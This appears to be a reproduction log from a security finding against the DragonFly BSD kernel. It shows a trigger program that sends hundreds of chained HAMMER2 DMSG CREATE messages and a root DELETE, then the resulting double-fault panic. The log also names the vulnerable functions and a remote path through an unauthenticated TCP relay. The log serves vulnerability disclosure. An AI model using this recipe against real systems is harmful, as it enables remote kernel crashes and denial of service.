DF-0017 / run.log
============================================================
DF-0017 — DECISIVE RUN LOG (full, untrimmed)
============================================================
Guest: DragonFly v6.5.0.1712.g89e6a-DEVELOPMENT (master DEV, X86_64_GENERIC)
Setup: /boot/loader.conf has console="comconsole" so the kernel panic +
DDB backtrace land on the QEMU serial line (dfbsd-qemu/boot.log),
because the default vidconsole is headless (-display none).
PRECONDITION (resolved the prior "inconclusive" blocker):
The hammer2 userland cluster daemon (pid 68, "hammer2: hammer2
autoconn_thread") connects every disk's DMSG iocom at boot via
DIOCRECLUSTER (sbin/hammer2/cmd_service.c:898), leaving each disk
iocom's reader thread blocked in fp_read() on a pipe to the daemon.
kdmsg_iocom_reconnect() (sys/kern/kern_dmsg.c:141) then deadlocks
waiting for that stuck reader to exit. Killing the daemon breaks the
pipes, the readers get EOF and exit, msgrd_td becomes NULL, and a
fresh DIOCRECLUSTER then succeeds. (Root fs hammer2 mount has its own
kernel iocom and is unaffected by killing the userland daemon.)
=> run.sh performs: pkill -9 -x hammer2 ; sleep 2 ; ./trigger 300
============================================================
CONTROL RUN: depth=5 (shallow chain -- must NOT overflow)
============================================================
$ ./trigger 5
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 5 chained CREATEs + root DELETE
[4] wrote 5 CREATEs
[5] wrote DELETE root (rv=64); waiting for panic...
[6] survived sleep(3); closing sv[1] to trigger EOF path
[7] survived; no panic observed
TRIGGER_EXIT=0
Guest: up. dmesg: clean (no panic/fault/kdmsg warnings).
=> depth=5 does NOT panic. Confirms the panic is depth/recursion-driven.
============================================================
PANIC RUN: depth=300 (deep chain -- overflows 16 KB stack)
============================================================
$ ./trigger 300
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 300 chained CREATEs + root DELETE
<<< guest PANICKED here (ssh died mid-run; remaining buffered stdout lost) >>>
--- guest status: down (frozen in DDB) ---
--- panic captured on serial console (dfbsd-qemu/boot.log): ---
login: DOUBLE FAULT
Fatal double fault
rip = 0xffffffff806564d4
rsp = 0xfffff800ab38f000
rbp = 0xfffff800ab38f000
cpuid = 1; lapic id = 1
panic: double fault
cpuid = 1
Trace beginning at frame 0xfffff8004602eec8
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c
Debugger("panic")
CPU1 stopping CPUs: 0x00000001
stopped
Stopped at Debugger+0x7c: movb $0,0xbd77f9(%rip)
db>
=> depth=300 PANICS with a kernel-stack-overflow double fault.
Reproducible (identical signature on a 2nd fresh reset run; see
panic.txt). Guest must be reset via `vm.sh reset`.
============================================================
CONCLUSION
============================================================
REPRODUCED. Unbounded recursion in kdmsg_simulate_failure() /
kdmsg_state_dying() (sys/kern/kern_dmsg.c:1346 / :1428) overflows the
16 KB LWKT kernel thread stack when a DMSG peer builds a deep circuit
chain (>= ~hundreds of CREATE messages) and teardown is driven. Result:
guaranteed kernel panic (double fault) -> full-system DoS. No guard
page on the LWKT stack, so it is also an (uncontrolled) kernel memory-
corruption primitive. Reachable locally via DIOCRECLUSTER (root /
operator) or remotely via the unauthenticated HAMMER2 cluster relay
(the hammer2 daemon listens on TCP 987 and relays peer DMSG traffic
into the kernel disk iocom; LNK_AUTH is unimplemented and receive-side
CRC is not verified).